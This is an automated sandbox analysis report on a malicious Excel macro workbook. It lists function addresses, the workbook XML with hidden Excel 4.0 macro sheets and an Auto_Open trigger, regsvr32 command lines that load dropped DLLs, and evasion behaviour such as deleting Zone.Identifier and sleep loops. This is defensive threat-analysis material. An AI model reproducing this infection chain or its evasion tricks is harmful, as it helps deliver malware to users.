Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002325E7 4_2_002325E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002431D5 4_2_002431D5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00240A27 4_2_00240A27
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024E63C 4_2_0024E63C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00239C3D 4_2_00239C3D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023323D 4_2_0023323D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00234E03 4_2_00234E03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024B605 4_2_0024B605
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00242606 4_2_00242606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00239400 4_2_00239400
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00250A1E 4_2_00250A1E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024C064 4_2_0024C064
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024DC64 4_2_0024DC64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024A455 4_2_0024A455
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00232050 4_2_00232050
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023EC5D 4_2_0023EC5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00247CA5 4_2_00247CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002444A7 4_2_002444A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00242CAC 4_2_00242CAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024F6AE 4_2_0024F6AE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00237AB6 4_2_00237AB6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002362BA 4_2_002362BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00250887 4_2_00250887
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023F88D 4_2_0023F88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00232E8C 4_2_00232E8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023EA8C 4_2_0023EA8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00234497 4_2_00234497
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00243E98 4_2_00243E98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024609A 4_2_0024609A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023E4E2 4_2_0023E4E2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002506E7 4_2_002506E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024E2E1 4_2_0024E2E1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023DAE6 4_2_0023DAE6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024E4E3 4_2_0024E4E3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00248EF4 4_2_00248EF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023FEF2 4_2_0023FEF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023D0F7 4_2_0023D0F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002492F0 4_2_002492F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002486C1 4_2_002486C1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024EECF 4_2_0024EECF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002446DD 4_2_002446DD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023192C 4_2_0023192C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023D933 4_2_0023D933
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00244930 4_2_00244930
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00237336 4_2_00237336
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00231B3F 4_2_00231B3F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00234D13 4_2_00234D13
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00235717 4_2_00235717
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023AF67 4_2_0023AF67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00236F64 4_2_00236F64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023BF6E 4_2_0023BF6E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024F571 4_2_0024F571
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00234949 4_2_00234949
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024FF4A 4_2_0024FF4A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00239B4C 4_2_00239B4C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023C14C 4_2_0023C14C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024815D 4_2_0024815D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00235FA3 4_2_00235FA3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002351B7 4_2_002351B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024A1B1 4_2_0024A1B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024AFB1 4_2_0024AFB1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023B7B5 4_2_0023B7B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023C7B4 4_2_0023C7B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024B1BA 4_2_0024B1BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00240B84 4_2_00240B84
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00240F87 4_2_00240F87
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023C388 4_2_0023C388
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00246B98 4_2_00246B98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024C5E5 4_2_0024C5E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002475E7 4_2_002475E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024A9EE 4_2_0024A9EE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002451F0 4_2_002451F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002353F6 4_2_002353F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002389F6 4_2_002389F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024DFCE 4_2_0024DFCE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00241DCF 4_2_00241DCF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040EC5D 5_2_0040EC5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041C064 5_2_0041C064
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00420A1E 5_2_00420A1E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041E63C 5_2_0041E63C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00409C3D 5_2_00409C3D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00405AC9 5_2_00405AC9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041EECF 5_2_0041EECF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00408ED3 5_2_00408ED3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040E4E2 5_2_0040E4E2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040FEF2 5_2_0040FEF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00402E8C 5_2_00402E8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041609A 5_2_0041609A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00412CAC 5_2_00412CAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040C14C 5_2_0040C14C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041E978 5_2_0041E978
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00407336 5_2_00407336
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041C5E5 5_2_0041C5E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004025E7 5_2_004025E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004151F0 5_2_004151F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00410B84 5_2_00410B84
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00410F87 5_2_00410F87
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00416B98 5_2_00416B98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041AFB1 5_2_0041AFB1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040B7B5 5_2_0040B7B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004051B7 5_2_004051B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00402050 5_2_00402050
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00417A53 5_2_00417A53
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041A455 5_2_0041A455
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041DC64 5_2_0041DC64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00409400 5_2_00409400
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00404E03 5_2_00404E03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041B605 5_2_0041B605
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00412606 5_2_00412606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00410A27 5_2_00410A27
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040323D 5_2_0040323D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004186C1 5_2_004186C1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004146DD 5_2_004146DD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041FADC 5_2_0041FADC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041E2E1 5_2_0041E2E1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041E4E3 5_2_0041E4E3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004206E7 5_2_004206E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040DAE6 5_2_0040DAE6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004192F0 5_2_004192F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00418EF4 5_2_00418EF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040D0F7 5_2_0040D0F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00420887 5_2_00420887
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040EA8C 5_2_0040EA8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040F88D 5_2_0040F88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00404497 5_2_00404497
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00413E98 5_2_00413E98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00417CA5 5_2_00417CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004144A7 5_2_004144A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041F6AE 5_2_0041F6AE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00407AB6 5_2_00407AB6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004062BA 5_2_004062BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00403F40 5_2_00403F40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040DF44 5_2_0040DF44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00404949 5_2_00404949
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041FF4A 5_2_0041FF4A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00409B4C 5_2_00409B4C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00410552 5_2_00410552
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041815D 5_2_0041815D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00406F64 5_2_00406F64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040AF67 5_2_0040AF67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040BF6E 5_2_0040BF6E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041F571 5_2_0041F571
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00404D13 5_2_00404D13
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00405717 5_2_00405717
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040192C 5_2_0040192C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00414930 5_2_00414930
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040D933 5_2_0040D933
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00401B3F 5_2_00401B3F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00411DCF 5_2_00411DCF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041DFCE 5_2_0041DFCE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004131D5 5_2_004131D5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004175E7 5_2_004175E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041A9EE 5_2_0041A9EE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004053F6 5_2_004053F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004089F6 5_2_004089F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040C388 5_2_0040C388
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00418BA1 5_2_00418BA1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040B1A1 5_2_0040B1A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00405FA3 5_2_00405FA3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041A1B1 5_2_0041A1B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040C7B4 5_2_0040C7B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004139B8 5_2_004139B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0041B1BA 5_2_0041B1BA
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 1001A9E0 appears 189 times
Found a hidden Excel 4.0 Macro sheet
Source: qd_34768.xlsm Macro extractor: Sheet name: PIMKE
Source: qd_34768.xlsm Macro extractor: Sheet name: PIMKE
PE file contains strange resources
Source: eVzUZ7dv5zBAXa5[1].dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eVzUZ7dv5zBAXa5[1].dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xewn.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xewn.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Excel documents contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: (2)\CIR\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F5AAA563-2BE5-4D04-A527-156FA41B3CA2}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Odjfs" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Dghdb" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Vghsg" sheetId="4" state="hidden" r:id="rId4"/><sheet name="Urgds" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Njkg" sheetId="6" state="hidden" r:id="rId6"/><sheet name="PIMKE" sheetId="7" state="hidden" r:id="rId7"/></sheets><definedNames><definedName name="IVFB1">PIMKE!$C$14</definedName><definedName name="IVFB2">PIMKE!$C$16</definedName><definedName name="IVFB3">PIMKE!$C$18</definedName><definedName name="IVFB4">PIMKE!$C$20</definedName><definedName name="IVFB5">PIMKE!$C$22</definedName><definedName name="IVFB6">PIMKE!$C$24</definedName><definedName name="IVFB7">PIMKE!$C$26</definedName><definedName name="_xlnm.Auto_Open567980">PIMKE!$C$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:Single"/><xcalcf:feature name="microsoft.com:FV"/><xcalcf:feature name="microsoft.com:CNMTM"/><xcalcf:feature name="microsoft.com:LET_WF"/><xcalcf:feature name="microsoft.com:LAMBDA_WF"/></xcalcf:calcFeatures></ext></extLst></workbook>
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: qd_34768.xlsm ReversingLabs: Detection: 40%
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd" Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn" Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$qd_34768.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR229C.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@7/9@1/2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001741F __EH_prolog,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance, 3_2_1001741F
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_0040F7F9 CreateToolhelp32Snapshot, 5_2_0040F7F9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10009530 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z, 3_2_10009530
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet5.xml
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet6.xml
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/media/image1.jpg
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001B2B0 push eax; ret 3_2_1001B2DE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001A9E0 push eax; ret 3_2_1001A9FE
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_100657FF
Registers a DLL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy) Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\regsvr32.exe File opened: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File opened: C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1002B150 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC, 3_2_1002B150
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1002B900 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA, 3_2_1002B900
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000EA9B IsIconic,GetWindowPlacement,GetWindowRect, 3_2_1000EA9B
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_100657FF
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1916 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2264 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2916 Thread sleep time: -120000s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
